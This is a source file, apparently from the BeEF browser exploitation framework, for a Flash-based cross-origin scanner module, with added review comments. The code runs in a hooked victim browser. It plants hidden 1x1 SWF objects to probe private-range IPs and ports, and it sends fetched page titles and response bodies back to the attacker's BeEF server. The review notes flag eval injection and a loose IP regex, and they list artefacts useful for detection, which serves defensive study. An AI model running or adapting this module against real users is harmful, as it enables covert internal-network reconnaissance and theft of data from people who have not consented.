GitHub Repository: beefproject/beef
Path: blob/master/modules/network/cross_origin_scanner_flash/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Cross-Origin Scanner (Flash) command module body, run in the hooked browser.
// It builds a list of IPv4 hosts and ports from the module options, embeds
// ContentHijacking.swf (served by the BeEF server) once per host/port pair,
// asks the SWF to fetch http://<host>:<port>/, and reports each outcome to the
// command URL through beef.net.send().
//
// The ERB placeholders below are presumably substituted server-side before the
// script is delivered. NOTE(review): they land inside JS string literals with
// no escaping visible in this file -- confirm the option values are validated
// before rendering.
//
// Artefacts visible in the page while this runs (useful when triaging a
// suspected hook): a <script> element loading /swfobject.js from the BeEF
// host, hidden 1x1 <div>/<object> pairs whose object id starts with
// "cross_origin_flash_", and the Flash parameter AllowScriptAccess="always".
beef.execute(function() {

  var ips = new Array();
  var ipRange = "<%= @ipRange %>";
  var ports = "<%= @ports %>";
  var threads = parseInt("<%= @threads %>", 10);
  // timeout option is given in seconds; converted to milliseconds here
  var timeout = parseInt("<%= @timeout %>", 10)*1000;

  // check if Flash is installed (not always reliable)
  // On failure an error status is reported to the command URL and nothing else runs.
  if(!beef.browser.hasFlash()) {
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error());
    return;
  }

  // set target ports
  // `ports` is always a string literal at this point, so the null check always
  // passes; the comma-separated list becomes an array of strings. No numeric
  // validation of the individual entries is visible here.
  if (ports != null) {
    ports = ports.split(',');
  }

  // set target IP addresses
  if (ipRange == 'common') {
    // use default IPs
    // Fixed list of private-range (192.168.x.x and 10.x.x.x) addresses.
    ips = [
      '192.168.0.1',
      '192.168.0.100',
      '192.168.0.254',
      '192.168.1.1',
      '192.168.1.100',
      '192.168.1.254',
      '10.0.0.1',
      '10.1.1.1',
      '192.168.2.1',
      '192.168.2.254',
      '192.168.100.1',
      '192.168.100.254',
      '192.168.123.1',
      '192.168.123.254',
      '192.168.10.1',
      '192.168.10.254'
    ];
  } else {
    // set target IP range
    // Expects "a.b.c.d-e.f.g.h" with each octet in 0-255.
    // NOTE(review): the pattern is passed as a string literal, so the
    // backslashes before '.' and '-' are consumed by the string parser and the
    // resulting expression treats each '.' as "any character". The check is
    // therefore looser than it reads.
    var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
    if (range == null || range[1] == null) {
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
      return;
    }
    // ipRange will be in the form of 192.168.0.1-192.168.0.254
    // (only C class IP ranges are supported atm)
    // Only the last octet is iterated; the first three octets are taken from
    // the lower bound and the upper bound's first three octets are not compared.
    // NOTE(review): ipBounds, lowerBound, upperBound and ipToTest are assigned
    // without `var`, so they become globals on the hooked page.
    ipBounds = ipRange.split('-');
    lowerBound = ipBounds[0].split('.')[3];
    upperBound = ipBounds[1].split('.')[3];
    // NOTE(review): lowerBound and upperBound are strings; `i` only becomes a
    // number after the first `i++`, so the first comparison is string-vs-string
    // -- confirm this matches the intended numeric ordering.
    for (var i = lowerBound; i <= upperBound; i++){
      ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
      ips.push(ipToTest);
    }
  }

  // configure workers
  // WorkerQueue(id, frequency): a FIFO of code strings drained one per
  // `frequency` milliseconds. `id` is used only in the completion debug message.
  // NOTE(review): assigned without `var`, so WorkerQueue is a global.
  WorkerQueue = function(id, frequency) {
    var stack = [];
    var timer = null;
    // redundant re-declaration of the parameter; the value is unchanged
    var frequency = frequency;
    var start_scan = (new Date).getTime();
    // Runs the oldest queued string with eval(), then stops the interval timer
    // once the queue is empty and logs the elapsed time.
    // NOTE(review): the queued strings are built by concatenating host and port
    // values (see the job allocation loop at the end of this file), so a quote
    // character in either value would change the code that eval() runs.
    this.process = function() {
      var item = stack.shift();
      eval(item);
      if (stack.length === 0) {
        clearInterval(timer);
        timer = null;
        var interval = (new Date).getTime() - start_scan;
        beef.debug("[Cross-Origin Scanner (Flash)] Worker #"+id+" has finished ["+interval+" ms]");
        return;
      }
    }
    // Appends a job and starts the interval timer if it is not already running.
    // The first job therefore runs one `frequency` interval after queueing.
    this.queue = function(item) {
      stack.push(item);
      if (timer === null) timer = setInterval(this.process, frequency);
    }
  }

  // load the SWF object from the BeEF server
  // then request the specified URL via Flash
  //
  // scanUrl(proto, host, port): embeds one hidden SWF instance and asks it to
  // fetch http://host:port/.
  // NOTE(review): `proto` is accepted but never read; both the URL below and
  // the `proto` value inside the callback text are hard-coded to "http".
  var scanUrl = function(proto, host, port) {
    beef.debug('[Cross-Origin Scanner (Flash)] Creating Flash object...');
    // 8-character base-36 id from Math.random(); used only to name DOM elements
    var placeholder_id = Math.random().toString(36).substring(2,10);
    // NOTE(review): `div` is assigned without `var` (implicit global)
    div = document.createElement('div');
    div.setAttribute('id', placeholder_id);
    div.setAttribute('style', 'visibility: hidden');
    $j('body').append(div);

    try {
      swfobject.embedSWF(
        beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf',
        placeholder_id,
        "1", // Width
        "1", // Height
        "9", // Flash version required. Hard-coded to 9+ for no real reason. Tested on Flash 12.
        false, // Don't prompt user to install Flash
        {}, // FlashVars
        // Flash params: AllowScriptAccess "always" lets the SWF call page
        // JavaScript even though it is served from a different origin.
        {'AllowScriptAccess': 'always'},
        // attributes of the generated <object>; the id is what the code below
        // and the cleanup timer look up
        {id: 'cross_origin_flash_'+placeholder_id, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'},
        function (e) {
          if (e.success) {
            // 200 millisecond delay due to Flash executing the callback with a success event
            // even though the object is not yet ready to expose its methods to JS
            setTimeout(function(){
              var url = 'http://'+host+':'+port+'/';
              beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url);
              var objCaller = document.getElementById('cross_origin_flash_'+placeholder_id);
              try {
                // GETURL receives the callback as source text plus the URL.
                // host and port are spliced into that text unescaped.
                // The callback text, once run with the returned data:
                //  - unescape()s the data and logs it;
                //  - reports "status=alive" when the data contains
                //    "securityErrorHandler" (presumably a Flash security error
                //    raised when the host answered but did not permit the
                //    cross-origin read -- confirm against the SWF source);
                //  - stops unless the data contains "Hijacked Contents:";
                //  - extracts the first <title>...</title> match;
                //  - sends proto/ip/port/title/response to the command URL.
                // NOTE(review): replace() is called with a single argument, and
                // title/response are concatenated into the result string without
                // URL-encoding -- confirm how the server parses this.
                objCaller.GETURL('function(data) { '+
                  'var proto = "http";' +
                  'var host = "'+host+'";' +
                  'var port = "'+port+'";' +
                  'var data = unescape(data);' +
                  'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' +

                  'if (data.match("securityErrorHandler")) {' +
                  '  beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive", beef.are.status_success());' +
                  '}' +

                  'if (!data.match("Hijacked Contents:")) return;' +
                  'var response = data.replace(/^Hijacked Contents:\\r\\n/);' +

                  'var title = "";' +
                  'if (response.match("<title>(.*?)<\\/title>")) {' +
                  '  title = response.match("<title>(.*?)<\\/title>")[1];' +
                  '}' +

                  'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' +
                  'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response, beef.are.status_success());' +
                ' }', url);
              } catch(e) {
                beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message);
              }
            }, 200);
          } else if (e.error) {
            beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object');
          } else beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object. Perhaps Flash is not installed?');
        });
      // Remove the SWF object from the DOM after <timeout> seconds
      // this also kills the outbound connections from the SWF object
      // NOTE(review): string form of setTimeout, evaluated like eval(); the only
      // interpolated value is the locally generated placeholder_id. Removal
      // errors are swallowed by the empty catch.
      setTimeout('try { document.body.removeChild(document.getElementById("cross_origin_flash_'+placeholder_id+'")); } catch(e) {}', timeout);
    } catch (e) {
      beef.debug("[Cross-Origin Scanner (Flash)] Something went horribly wrong creating the Flash object with swfobject: " + e.message);
    }
    beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the flash object to load...");
  }

  // append SWFObject script
  // Loaded from the BeEF server; scanUrl() relies on the `swfobject` global it
  // defines. There is no explicit wait for the script to load -- the first job
  // only runs one worker interval after it is queued.
  $j('body').append('<scr'+'ipt type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></scr'+'ipt>');

  // create workers
  // Each worker drains one job per `timeout` milliseconds, the same period after
  // which scanUrl() removes its SWF object.
  beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)");
  var workers = new Array();
  for (var id = 0; id < threads; id++) workers.push(new WorkerQueue(id, timeout));

  // allocate jobs to workers
  // Hosts are assigned round-robin (i % threads); every port for a given host
  // goes to the same worker. Each job is a code string that the worker later
  // runs with eval(). `proto` is chosen here but scanUrl() does not use it.
  for (var i = 0; i < ips.length; i++) {
    var worker = workers[i % threads];
    for (var p = 0; p < ports.length; p++) {
      var host = ips[i];
      var port = ports[p];
      if (port == '443') var proto = 'https'; else var proto = 'http';
      worker.queue("scanUrl('"+proto+"', '"+host+"', '"+port+"');");
    }
  }

});